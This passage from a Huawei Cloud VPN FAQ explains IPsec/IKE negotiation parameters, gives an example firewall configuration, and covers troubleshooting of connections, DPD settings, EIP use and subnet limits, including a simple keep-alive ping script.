interconnect with HUAWEI CLOUD.Most enterprise-level routers and firewalls support IPsec protocol.

● However, some devices support IPsec VPN only after you purchase required softwarelicenses.Contact the data center administrator to confirm the device model with the vendor.

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 57

6.2 What Are VPN Negotiation Parameters? What AreTheir Default Values?

Table 6-1 VPN negotiation parameters

Policy Parameter Value

IKE AuthenticationAlgorithm

SHA2-256 (default), SHA1, MD5,SHA2-384, and SHA2-512

EncryptionAlgorithm

AES-128 (default), AES-192, AES-256,and 3DES

DH Algorithm Group 14 (default), Group 1, Group 2,Group 5, Group 15, Group 16, Group19, Group 20, and Group 21NOTE

In some regions, only Group 14, Group 2,and Group 5 are available.

Version v2 (default) and v1

Lifecycle (s) 86400 (default)Unit: SecondValue range: 60 to 604800

Negotiation Mode Main (default) and AggressiveThis parameter is mandatory whenVersion is set to v1.

IPsec AuthenticationAlgorithm

SHA2-256 (default), SHA1, MD5,SHA2-384, and SHA2-512

EncryptionAlgorithm

AES-128 (default), AES-192, AES-256,and 3DES

PFS DH group 14 (default), DH group 1,DH group 2, DH group 5, DH group15, DH group 16, DH group 19, DHgroup 20, DH group 21, or DisableNOTE

In some regions, only DH group 14, DHgroup 2, and DH group 5 are available.

Transfer Protocol ESP (default), AH, and AH-ESP

PacketEncapsulationMode

TUNNEL

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 58

Policy Parameter Value

Lifecycle (s) 3600 (default)Unit: SecondValue range: 480 to 604800

NO TE

● Perfect Forward Secrecy (PFS) is a security feature.IKE negotiation has two phases, phase one and phase two. The key of phase two (IPsecSA) is derived from the key generated in phase one. Once the key in phase one isdisclosed, the security of the IPsec VPN may be adversely affected. To improve the keysecurity, IKE provides the PFS function. After PFS is turned on, an additional DHexchange will be performed during IPsec SA negotiation, and a new IPsec SA key will begenerated, improving IPsec SA security.

● To ensure security, PFS is enabled on HUAWEI CLOUD by default. Ensure that PFS is alsoenabled on the gateway in your on-premises data center. Otherwise, the negotiation willfail.

● To enable PFS, ensure that the configurations on both ends of a VPN are the same.● The traffic-based lifetime of IPsec SA on the HUAWEI CLOUD VPN is default to

1,843,200 KB and cannot be changed. This lifetime does not affect the establishment ofan IPsec SA.

6.3 Will an IPsec VPN Connection Be EstablishedAutomatically?

After you complete the configurations on both ends of an IPsec VPN connection,the VPN connection will not be automatically established only after data flowsbetween the two ends of the connection. If no data flows between the cloud andthe on-premises data center, the VPN connection will always be in the down state.Any data generated by accessing or pinging between servers can trigger theestablishment of a VPN connection.

The establishment of a VPN connection can be triggered either through thegateways of the VPN connection or by the traffic between servers on the cloudand in an on-premises data center.

However, automatic establishment of a VPN connection cannot be triggered by aVPN gateway on HUAWEI CLOUD. Verify that the establishment of your VPNconnection can be triggered by the data flows between the two ends of the VPNconnection. That is, check whether a VPN connection can be established after youping a server on the cloud from a server in the on-premises data center, andwhether a VPN connection can be established after you disconnect the connectionand ping a server in the on-premises data center from a server on the cloud.

NO TE

The source and destination addresses of the ping packets must be protected by the VPN.Before a VPN connection is established, the gateway IP addresses of both ends can bepinged. However, pinging the gateway IP addresses does not trigger the establishment ofthe VPN connection.

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 59

6.4 How Do I Configure a VPN for a Device in a DataCenter? (Configuring the VPN on a Huawei USG6600Series Firewall)

Due to the symmetry of the tunnel, the VPN parameters configured on the cloudmust be the same as those configured in your own data center. If they aredifferent, a VPN cannot be established.

To set up a VPN, you also need to configure the IPsec VPN on the router orfirewall in your own data center. The configuration method may vary dependingon your network device in use. For details, see the configuration guide of yournetwork device.

This section describes how to configure the IPsec VPN on a Huawei USG6600series V100R001C30SPC300 firewall for your reference.

For example, the subnets of the data center are 192.168.3.0/24 and192.168.4.0/24, the subnets of the VPC are 192.168.1.0/24 and 192.168.2.0/24, andthe public IP address of the IPsec tunnel egress in the VPC is XXX.XXX.XX.XX, whichcan be obtained from the local gateway parameters of the IPsec VPN in the VPC.

Procedure1. Log in to the CLI of the firewall.2. Check firewall version information.

display version 17:20:502017/03/09Huawei Versatile Security Platform SoftwareSoftware Version: USG6600 V100R001C30SPC300 (VRP (R) Software, Version 5.30)

3. Create an access control list (ACL) and bind it to the target VPN instance.acl number 3065 vpn-instance vpn64rule 1 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.1.0 0.0.0.255rule 2 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.2.0 0.0.0.255rule 3 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.1.0 0.0.0.255rule 4 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.2.0 0.0.0.255q

4. Create an IKE proposal.ike proposal 64 dh group5 authentication-algorithm sha1 integrity-algorithm hmac-sha2-256 sa duration 3600 q

5. Create an IKE peer and reference the created IKE proposal. The peer IPaddress is 93.188.242.110.ike peer vpnikepeer_64pre-shared-key ******** (******** specifies the pre-shared key.)ike-proposal 64undo version 2remote-address vpn-instance vpn64 93.188.242.110sa binding vpn-instance vpn64q

6. Create an IPsec protocol.ipsec proposal ipsecpro64encapsulation-mode tunnel

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 60

esp authentication-algorithm sha1q

7. Create an IPsec policy and reference the IKE policy and IPsec proposal.ipsec policy vpnipsec64 1 isakmpsecurity acl 3065pfs dh-group5ike-peer vpnikepeer_64proposal ipsecpro64local-address xx.xx.xx.xxq

8. Apply the IPsec policy to the subinterface.interface GigabitEthernet0/0/2.64ipsec policy vpnipsec64q

9. Test the connectivity.After you perform the preceding operations, you can test the connectivitybetween your ECSs on the cloud and the servers in your data center. Fordetails, see the following figure.

Figure 6-1 Connectivity test

6.5 How Should I Configure Gateway Device of theCustomer Data Center When I Use a VPN to Connect tothe Cloud?

Determine the subnet of the customer data center, subnet on the cloud, andgateway IP addresses at both ends.

Then, configure IPsec on the gateway of the customer data center according tothe VPN negotiation policies on the cloud, and add rules to the security groupassociated with the VPC to allow ICMP packets in both the inbound and outbounddirections.

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 61

● Route setting: Add routes starting from the customer gateway and destiningfor the VPN gateway egress. The next hop of the route on the VPN gateway isthe public gateway IP address in the outbound direction.

● NAT setting: On the VPN gateway device, disable NAT for the local subnet toaccess the VPC subnet. Add security group rules to allow mutual accessbetween the local subnet and the VPC subnet, and allow the UDP 500, UDP4500, ESP (IP protocol 50), and AH (IP protocol 51) packets both from and toIP addresses of the VPN gateway on the cloud and the gateway of thecustomer data center.

6.6 Can HUAWEI CLOUD VPN Connect to a RemoteGateway Through a Domain Name?

No. A VPN connection can only connect to a remote gateway through the gatewaypublic IP address.

6.7 How Many Tunnels Does My VPN ConnectionHave?

The number of tunnels in a VPN connection is related to the number of localsubnets and remote subnets. The total number of tunnels is equal to the numberobtained by multiplying the number of local subnets and that of remote subnetsof a VPN. The status of a VPN connection is normal as long as its one tunnel is inthe active state. If you need each tunnel to be in the active state, data flows needto be triggered between every two subnets.

6.8 How Do I Allow Specific Servers to Access a Subneton the Cloud Through a Created VPN Connection?

Configurations off the cloud

● Configure deny rules on VPN devices.● Configure ACLs on routers or switches.

Configurations on the cloud

● Configure security group rules to deny access from specific IP addresses.● Configure network ACL rules.

NO TE

All rules must be added to the device before the VPN tunnel is established. Do not changethe local subnet and the remote subnet to restrict the access.

6.9 Do HUAWEI CLOUD VPNs Have the DPDMechanism Enabled?

Yes.

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 62

HUAWEI CLOUD VPNs have the DPD mechanism enabled by default to detect thestatus of the IKE process in the customer data center.

After three consecutive detection failures, HUAWEI CLOUD considers that the IKEprocess of the customer data center is abnormal. In this case, HUAWEI CLOUDdeletes the local tunnel to ensure tunnel synchronization between the two ends.

The DPD protocol does not require that the peer end be configured synchronously,but requires that the peer end can respond to DPD detections. To ensure that thetunnel status of the two ends is consistent and avoid that one end has a tunneland the other not, it is recommended that you enable the DPD mechanism of thegateway on your side to detect the IKE process status of the VPN service on theHUAWEI CLOUD side.

NO TE

After DPD fails, the tunnel will be deleted without affecting service stability.DPD can detect exceptions of the IKE process on the peer end in time and reset the tunnelto ensure tunnel synchronization between the two ends. After a tunnel is deleted, if there isuser traffic transmitted over the tunnel, the tunnel can be re-established throughnegotiation.

6.10 How Can I Use Security Groups to Prevent ECSs ina VPC From Being Accessed Through a VPN toImplement Security Isolation?

You can configure security groups to allow access only to specific CIDR blocks orECSs in a VPC through a VPN.

Configuration example: Prevent ECSs in the subnet 10.1.0.0/24 in a VPC fromaccessing the customer subnet 192.168.1.0/24.

Configuration method:

1. Create security groups 1 and 2.2. Security group 1 denies access from the subnet 192.168.1.0/24.3. Security group 2 allows access from the subnet 192.168.1.0/24.4. Add ECSs in the subnet 10.1.0.0/24 to security group 1 and other ECSs to

security group 2.

6.11 Will a VPN Connection Be Reestablished After ItsConfiguration Is Modified?

A VPN connection consists of the local subnet, remote subnet, remote gateway,pre-shared key, IKE negotiation policy, and IPsec negotiation policy. A VPNconnection is modified if any of the following happens:

● If the local and remote subnets are modified, the connection ID remainsunchanged, but the subnet information at both ends of the connection isupdated. If not all subnets are updated, the established tunnel betweensubnets will not be re-established.

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 63

● If the IP address of the remote gateway is changed, the connection ID will notbe changed, but the peer end has changed. The connection needs to be re-established.

● If only the pre-shared keys of the connection are changed, the connection IDand status will not be changed. The keys will be checked again duringrenegotiation. If the keys do not match, the renegotiation fails.

● If the negotiation policy is modified (pre-shared key authentication isrequired), the connection ID will be changed and the connection needs to bere-established.

6.12 Why Cannot I Initiate Negotiation from AmazonWeb Services to HUAWEI CLOUD After They AreInterconnected?

After the VPN connection is established, Amazon Web Services (AWS) works inResponse mode and does not initiate negotiation. When data flows are sent fromthe AWS EC2 to the HUAWEI CLOUD ECS, the VPN connection will not betriggered to establish an SA.

According to the AWS document, negotiation can be initiated only from theHUAWEI CLOUD.

6.13 How Do I Configure DPD for Interconnecting withHUAWEI CLOUD?

By default, Dead Peer Detection (DPD) is enabled on HUAWEI CLOUD and cannotbe disabled.

Configure DPD as follows:

● DPD-type: on-demand● DPD idle-time: 30s● DPD retransmit-interval: 15s● DPD retry-limit: 3● DPD msg: seq-hash-notify

The DPD msg format on the two ends of the connection must be the same, butthe DPD type, idle time, retransmission interval, and retry limit can be different.

6.14 What Should I Do If My Firewall Cannot ReceiveResponse Packets of IKE Phase 1 from the HUAWEICLOUD VPN Gateway?

1. Check whether the public IP addresses of the two ends can communicate witheach other. You can run the ping command. By default, the gateway IPaddress on HUAWEI CLOUD can be pinged.

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 64

2. The on-premises gateway and HUAWEI CLOUD VPN gateway can exchangepackets on UDP port 500 and 4500.

3. Ensure that the source port number is not translated when the on-premisespublic IP address accesses the gateway IP address on HUAWEI CLOUD. If NATtraversal exists, ensure that the port number will not be changed after NATtraversal.

4. The IKE negotiation parameter settings at both ends must be the same. In theNAT traversal scenario, set the ID type off the cloud to IP and the local ID onthe cloud to the public IP address after NAT.

6.15 What Should I Do If My Firewall Cannot ReceiveResponse Packets from the HUAWEI CLOUD VPNSubnet?

1. Check the on-premises routes, security policies, NAT configuration, interestingtraffic, and negotiation policies for the Phase 2 negotiation.

– Route configurations: Send the data for accessing the cloud subnet to thetunnel.

– Security policies: Allow traffic from on-premises subnets to cloud subnets.

– NAT policies: Do not perform NAT when an on-premises subnet accessesa cloud subnet.

– Interesting traffic: Interesting traffic at both ends are configured in themirrored way. The address object name cannot be used for the interestingtraffic configured using IKEv2.

– Negotiation policies: Ensure the negotiations policies, especially PFS, atboth ends are the same.

2. After confirming that both Phase 1 and Phase 2 negotiations are normal,check the security group rules on the cloud to allow the on-premises subnetto access the cloud subnet using the ICMP protocol.

6.16 What Are the Bits of the DH Groups Used byHUAWEI CLOUD VPN?

The Diffie-Hellman (DH) groups determine the strength of the key used in the keyexchange process. Higher DH group numbers are usually more secure, but extratime is required to calculate the key.

Table 6-2 lists the bits corresponding to the DH groups used by VPN.

Table 6-2 Bit corresponding to each DH group

DH Group Modulus

1 768 bits

2 1024 bits

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 65

DH Group Modulus

5 1536 bits

14 2048 bits

15 3072 bits

16 4096 bits

19 ecp256 bits

20 ecp384 bits

21 ecp521 bits

NO TE

The following DH algorithms have security risks and are not recommended: DH group 1,DH group 2, and DH group 5.

Virtual Private NetworkFAQ 6 VPN Negotiation and Interconnection

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 66

7 Connection or Ping Failure

7.1 Why Is the VPN Connection Always in the NotConnected State Even After Its Configuration IsComplete?

Ensure that the pre-shared keys and negotiation information at both ends areconsistent. The local subnet and VPN gateway on the cloud are the remote subnetand remote gateway in the on-premises data center. The remote gateway andremote subnet on the cloud are the local gateway and local subnet in the on-premises data center.

Ensure that the routing, NAT, and security rules are correctly configured on thegateway device of your on-premises data center. Then, ping the servers in subnetsat both ends.

NO TE

VPN is triggered based on data flows. After you configure the VPN, ping the servers in thepeer subnet. Before running the ping command, disable the server firewall and allowinbound ICMP requests in the security group on the cloud.Pinging the gateway IP address cannot trigger VPN negotiation. Ping the server in thesubnet protected by the gateway.

7.2 How Can I Prevent VPN Connection Interruption?VPN connections may be renegotiated when the IPsec SA lifecycle is about toexpire or the data transferred through the VPN connection exceeds 20 GB. Usually,renegotiation does not interrupt VPN connections.

Most disconnections are caused by incorrect configurations on both ends of theVPN connection or renegotiation fails due to Internet exceptions.

The common causes of connection interruptions are as follows:

● ACLs of the devices at the two ends of the VPN connection do not match.● SA lifecycles at the two ends of the VPN connection do not match.

Virtual Private NetworkFAQ 7 Connection or Ping Failure

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 67

● DPD is not configured in the data center.

● Configuration is modified when the VPN is used.

● Packets are fragmented because the data size exceeds the MTU.

● Jitter occurs on the carrier's network.

Therefore, ensure that the following configurations to keep the VPN connectionalive:

● Local and remote subnets are matched pairs.

● SA lifecycles at the two ends of the VPN connection are consistent.

● DPD is enabled on the gateway device of the data center, and the number ofdetection times is greater than or equal to 5.

● Parameters are modified at both ends of the VPN connection during the useof the VPN connection.

● Set TCP MAX-MSS to 1300 for the gateway device in the data center.

● The bandwidth of the gateway in the data center is large enough to be usedby VPN.

● VPN connection negotiation can be triggered by the two ends and the activenegotiation configuration of the gateway in the data center has beenenabled.

● Run a long ping on the subnets at both ends. The script content is as follows:#!/bin/shhost=$1if [ -z $host ]; then echo "Usage: `basename $0` [HOST]" exit 1filog_name=$host".log"

while :; do result=`ping -W 1 -c 1 $host | grep 'bytes from '` if [ $? -gt 0 ]; then echo -e "`date +'%Y/%m/%d %H:%M:%S'` - host $host is down"| tee -a $log_name else echo -e "`date +'%Y/%m/%d %H:%M:%S'` - host $host is ok -`echo $result | cut -d ':' -f 2`"| tee -a $log_name fisleep 5 # avoid ping raindone#./ping.sh x.x.x.x >>/dev/null &

NO TE

1. Use the vi editor to copy the preceding script to the ping.sh file.

2. Run the chmod 777 ping.sh command to grant permissions to the file.

3. Run the ping command:

./ping.sh x.x.x.x >>/dev/null &

x.x.x.x indicates the IP address to be pinged.

4. After the ping command is executed, the x.x.x.x.log file is generated. Run thefollowing command:

tail -f x.x.x.x.log

You can view the long ping result in real time.

Virtual Private NetworkFAQ 7 Connection or Ping Failure

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 68

7.3 How Do I Quickly Restore an Interrupted IPsec VPNConnection?

1. Trigger IPsec negotiation by private network data flows. For example, twoprivate networks at both ends of the VPN connection ping each other. Iftraffic can be properly triggered, deploy a continuous ping script. For details,see How Can I Prevent VPN Connection Interruption?.

2. If the negotiation cannot be triggered, check the Internet connectivity bypinging the VPN gateway IP address and the remote gateway IP address. Bydefault, the HUAWEI CLOUD VPN gateway responds to ICMP packets.

3. If the Internet is normal, check whether a link switch occurs between multiplegateways. That is, the traffic for accessing the HUAWEI CLOUD gateway IPaddress does not flow out from the negotiated interfaces.

4. If there are no multiple ports or the port path is normal, change the PSKs atboth ends of the tunnel to trigger negotiation again.

5. If the negotiation fails, check whether the negotiation policies configured atboth ends are consistent and whether the interesting traffic at both ends ismutually mirrored.

6. If the negotiation policy and interesting flow configuration are correct, resetthe VPN connection status of the on-premises device. After the connectionstatus on HUAWEI CLOUD changes to Not connected, reset the VPNconnection of the on-premises device and trigger the data flow.

7. If the negotiation still cannot be triggered, perform the following operations:

a. Record the negotiation policy, PSK, local subnet, remote gateway, andremote subnet of the HUAWEI CLOUD VPN connection.

b. Use the existing gateway to create a connection. The negotiation policy,PSK, and local subnet are the same as those of the original connection.Randomly configure the remote gateway and remote subnet.

c. After the new connection is created, delete the original connection andchange the remote gateway and remote subnet of the new connection tothe recorded information.

d. Trigger the negotiation again.

If the IPsec tunnel status is still abnormal after you perform the precedingoperations, submit a service ticket to HUAWEI CLOUD customer service for help.

7.4 What Happens If the Bandwidth of a VPN GatewayExceeds the Size Specified When I Create the Gateway?

The bandwidth is used in the outbound direction of a VPC. If the bandwidthexceeds the size specified, network congestion will occur, some subnets cannot beaccessed, or even the VPN connection will be interrupted (the VPN detectionpackets cannot be received).

In this case, you are advised to increase the VPN gateway bandwidth size.

Virtual Private NetworkFAQ 7 Connection or Ping Failure

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 69

NO TE

The maximum bandwidth of a VPN connection is 300 Mbit/s.

7.5 Will an IPsec VPN Connection Be EstablishedAutomatically?

After you complete the configurations on both ends of an IPsec VPN connection,the VPN connection will not be automatically established only after data flowsbetween the two ends of the connection. If no data flows between the cloud andthe on-premises data center, the VPN connection will always be in the down state.Any data generated by accessing or pinging between servers can trigger theestablishment of a VPN connection.

The establishment of a VPN connection can be triggered either through thegateways of the VPN connection or by the traffic between servers on the cloudand in an on-premises data center.

However, automatic establishment of a VPN connection cannot be triggered by aVPN gateway on HUAWEI CLOUD. Verify that the establishment of your VPNconnection can be triggered by the data flows between the two ends of the VPNconnection. That is, check whether a VPN connection can be established after youping a server on the cloud from a server in the on-premises data center, andwhether a VPN connection can be established after you disconnect the connectionand ping a server in the on-premises data center from a server on the cloud.

NO TE

The source and destination addresses of the ping packets must be protected by the VPN.Before a VPN connection is established, the gateway IP addresses of both ends can bepinged. However, pinging the gateway IP addresses does not trigger the establishment ofthe VPN connection.

7.6 Why Cannot a Peer ECS Be Pinged Even the Statusof the VPN Connection Created Between the TwoRegions Is Normal?

By default, a security group allows all outbound traffic. To allow inbound traffic,add inbound rules to the security group of the ECS that needs to receive pingpackets and ensure that the security group allows inbound ICMP requests.

7.7 Why Subnets Cannot Access Each Other When theIDC and the Cloud Are Interconnected and the VPNConnection Is Normal?

If the VPN connection status is normal, the negotiation parameters at both endsare correct. Check whether there are routes starting from the customer gatewayand destining for the VPN gateway egress. The VPN gateway device has securitygroup rules that allow mutual access between subnets.

Virtual Private NetworkFAQ 7 Connection or Ping Failure

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 70

In addition, NAT is not required when the IDC subnet accesses the data on thecloud. Ensure that the access between two gateway IP addresses will not beblocked.

7.8 What Do I Do If a VPN Connection In Use IsInterrupted and a Message Is Displayed Indicating ThatTraffic from IP Addresses Not Whitelisted Generates?

This is usually caused by the mismatch between ACL rules configured on thegateways of both the cloud and the customer data center.

1. Check whether the local and remote subnets of the VPN connection arematched pairs. Ensure that ACL rules on the cloud and that of the customerdata center do not conflict each other.

2. The subnet/mask format is recommended for configuring interesting traffic inthe customer data center. Do not use the address object mode, which maycause incompatibility problems.

7.9 What Do I Do If a VPN Connection Is Interruptedand a Message Is Displayed Indicating That the DPDTimes Out?

This happens because the VPN connection has no access data. After the SAlifecycle ends, the VPN connection will be deleted because no response is receivedfrom the peer end after DPD is sent.

Solution

1. Enable DPD on the gateway device of the customer data center and testwhether data flows at both ends can trigger connection establishment.

2. Deploy the ping shell script on the servers at both ends. You can alsoconfigure data on the gateway of the customer data center to keep theconnection alive, for example, NQA on Huawei devices or IP SLA on Ciscodevices.

7.10 Why the Status of a VPN Connection Is NotConnected on the Management Console When It IsAlready Available?

There is a latency to display the latest VPN connection status on the managementconsole.

If the service access is normal, the VPN connection is established.

Virtual Private NetworkFAQ 7 Connection or Ping Failure

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 71

7.11 Will I Be Notified If a VPN Connection IsInterrupted?

The VPN connection status can be monitored. After a VPN connection is created,the VPN service reports the connection status information to Cloud Eye, but doesnot automatically send alarm notifications to you. To receive notifications, createalarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPNconnection and choose Operation > View Metric to view the VPN connectionstatus.

Figure 7-1 View Metric

7.12 What Can I Do If VPN Connection Setup Fails?1. Check the IKE and IPsec policies to see whether the negotiation modes and

encryption algorithms between the local and remote sides of the VPN are thesame.

a. If the IKE policy has been set up during phase one and the IPsec policyhas not been enabled in phase two, the IPsec policies between the localand remote sides of the VPN may be inconsistent.

b. If a Cisco physical device is used at the customer side, it is recommendedthat you use MD5. Then, set Authentication Mode to MD5 in the IPsecpolicy for the VPN created on the cloud.

2. Check whether the ACL configurations are correct.

If the subnets of your data center are 192.168.3.0/24 and 192.168.4.0/24, andthe VPC subnets are 192.168.1.0/24 and 192.168.2.0/24, configure the ACLrules for each data center subnet to allow the communication with the VPCsubnets. The following provides an example of ACL configurations:rule 1 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.1.0 0.0.0.255rule 2 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.2.0 0.0.0.255rule 3 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.1.0 0.0.0.255rule 4 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.2.0 0.0.0.255

3. After the configuration is complete, ping the local and the remote side fromeach other to check whether the VPN connection is normal.

Virtual Private NetworkFAQ 7 Connection or Ping Failure

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 72

7.13 What Should I Do If I Cannot Access the ECSs onthe Cloud from My Data Center or LAN Even If the VPNConnection Has Been Set Up?

The security group denies the access from all sources by default. If you want toaccess your ECSs, modify the security group configuration and allow the accessfrom the remote subnets.

7.14 Why Is Not Connected Displayed as the Status fora Successfully Created VPN?

After a VPN is created, its status changes to Normal only after the servers on thetwo sides of the VPN communicate with each other.

● IKE v1:

If no traffic goes through the VPN for a period of time, the VPN needs to berenegotiated. The negotiation time depends on the Lifecycle (s) value in theIPsec policy. Generally, Lifecycle (s) is set to 3600 (1 hour), indicating thatthe negotiation will be initiated in the fifty-fourth minute. If the negotiationsucceeds, the connection remains to the next round of negotiation. If thenegotiation fails, the VPN status changes to Not Connected within one hour.The connection can be restored only after the two sides of the VPNcommunicates with each other. The disconnection can be avoided by using anetwork monitoring tool, such as IP SLA, to generate packets.

● IKE v2: If no traffic goes through the VPN for a period of time, the VPNremains in the connected status.

7.15 Do HUAWEI CLOUD VPNs Have the DPDMechanism Enabled?

Yes.

HUAWEI CLOUD VPNs have the DPD mechanism enabled by default to detect thestatus of the IKE process in the customer data center.

After three consecutive detection failures, HUAWEI CLOUD considers that the IKEprocess of the customer data center is abnormal. In this case, HUAWEI CLOUDdeletes the local tunnel to ensure tunnel synchronization between the two ends.

The DPD protocol does not require that the peer end be configured synchronously,but requires that the peer end can respond to DPD detections. To ensure that thetunnel status of the two ends is consistent and avoid that one end has a tunneland the other not, it is recommended that you enable the DPD mechanism of thegateway on your side to detect the IKE process status of the VPN service on theHUAWEI CLOUD side.

Virtual Private NetworkFAQ 7 Connection or Ping Failure

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 73

NO TE

After DPD fails, the tunnel will be deleted without affecting service stability.DPD can detect exceptions of the IKE process on the peer end in time and reset the tunnelto ensure tunnel synchronization between the two ends. After a tunnel is deleted, if there isuser traffic transmitted over the tunnel, the tunnel can be re-established throughnegotiation.

Virtual Private NetworkFAQ 7 Connection or Ping Failure

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 74

8 EIPs

8.1 Can a VPN Gateway IP Address Be Retained Afterthe VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway isdeleted.

Deleting a VPN gateway will also delete the resources associated with thegateway.

NO TICE

Deleting the last connection of a pay-per-use VPN gateway will also delete thegateway. If you want to retain the IP address, do not delete the last VPNconnection.

8.2 Can an EIP Be Used as a VPN Gateway IP Address?No.

The IP address of a VPN gateway is assigned when the VPN gateway is createdand must be used together with the related configurations. An EIP does notsupport VPN interconnection.

8.3 Do I Need to Purchase an EIP for Servers ThatCommunicate with Each Other Through a VPN?

If a server in your data center needs to access an ECS on the cloud through a VPN,you do not need to purchase an EIP.

If the ECS needs to provide services accessible from the Internet, an EIP is required.

Virtual Private NetworkFAQ 8 EIPs

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 75

8.4 Why Does an ECS Have EIP Access InformationAfter I Enable a VPN?

This occurs because the ECS has an EIP bound before the VPN is used. That is, youcan access the ECS through the VPN or the EIP.

After the VPN is established, traffic from servers meeting ACL rules can enter thetunnel to access ECSs.

● If an EIP is bound to an ECS, devices on a non-VPN network can access theECS using the EIP.

● If the ECS can be accessed only through a VPN, unbind the EIP from the ECSafter the VPN interconnection is complete. When an ECS needs an EIP bound,you can use ACL rules to specify the traffic that can access the ECS throughthe EIP.

NO TE

Whether a user needs to retain an EIP depends on the user's service. If an ECS is used toobtain the data of the customer data center through a VPN, and also is used to provideservices accessible from the Internet users, its EIP needs to be retained.

8.5 Can the Gateway of a Customer Data Center HaveNo Fixed Public IP Address?

No.

To connect a customer data center to HUAWEI CLOUD through a VPN, thecustomer data center must have a fixed public IP address or a fixed public IPaddress after NAT mapping.

NO TE

Common home broadband routers, personal mobile terminals, and VPN services (such asL2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.

Virtual Private NetworkFAQ 8 EIPs

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 76

9 Route Configurations

9.1 What Is a Remote Gateway and Remote Subnet ina VPN Connection?

When creating a VPN connection, a subnet in HUAWEI CLOUD VPC is the localsubnet and the created VPN gateway is the local gateway. The connected subnetin the on-premises data center is the remote subnet and the gateway in the on-premises data center is the remote gateway.

A remote gateway IP address is a public network IP address. A remote subnet is asubnet of the on-premises data center that needs to connect to a HUAWEI CLOUDVPC through a VPN.

9.2 Where Can I Add a Route to Reach the RemoteSubnet on the VPN Console?

When a VPN connection is created, a route is automatically delivered to reach theremote subnet.

9.3 Do I Need to Add a Route to Reach the CustomerData Center Network for an ECS with Multiple NICs?

● If a primary NIC is used to establish a VPN with the customer network, noroute needs to be added.

● If a non-primary NIC is used to establish a VPN with the customer network,add a route to reach the gateway with a non-primary NIC of the customernetwork.

Virtual Private NetworkFAQ 9 Route Configurations

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 77

10 Subnet Setting

10.1 What Are the Precautions for Configuring theLocal and Remote Subnets of a VPN Connection?

● You can configure up to 5 local subnets. The product of the number of localsubnets and the number of remote subnets cannot exceed 255. If 255 isexceeded, consider supernetting the local or remote subnets.

● The local subnet cannot include the CIDR block of the remote subnet.● There are routes pointing to the local subnet in the VPC where the VPN

gateway resides.● If there are two connections (connection A and connection B) created for a

VPN gateway, and the remote subnet of connection A is within that ofconnection B, when the destination network to be accessed belongs to theoverlapped network segment, the connection created first is matched first,regardless of the connection status. (Mask length match is not used for thepolicy-based VPN.)

10.2 What Is the Limitation on the Number of Localand Remote Subnets of a VPN? Why Is an ErrorMessage Displayed When I Update the Local Subnet bySpecifying a CIDR Block?

● You can configure up to 5 local subnets. The product of the number of localsubnets and the number of remote subnets cannot exceed 255.

● A VPC delivers VPC subnet routes based on remote subnets of the VPNconnection, remote subnets of a Direct Connect connection, subnets of a VPCpeering connection, and subnets of a Cloud Connect connection. Each subnethas one subnet route.

● The number of VPC subnet routes cannot exceed 200. That is, in a VPC, thetotal number of remote subnets of the VPN connection, remote subnets ofthe Direct Connect connection, subnets of the VPC peering connection, and

Virtual Private NetworkFAQ 10 Subnet Setting

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 78

subnets of the Cloud Connect connection, and custom routes cannot exceed200.

10.3 What Do I Do If an Exception Occurs When I Adda Remote Subnet During VPN Connection Creation?

Check whether this remote subnet has been used as the destination of a VPCpeering, Cloud Connect, or Direct Connect connection route, which causes routingconflicts. If yes, delete the route and create a new one.

10.4 Can a VPN Gateway IP Address Be Retained Afterthe VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway isdeleted.

Deleting a VPN gateway will also delete the resources associated with thegateway.

NO TICE

Deleting the last connection of a pay-per-use VPN gateway will also delete thegateway. If you want to retain the IP address, do not delete the last VPNconnection.

10.5 How Do I Plan the CIDR Block of a VPC Accessedover a VPN Connection?

● The VPC CIDR block cannot overlap or conflict with the on-premises CIDRblock.

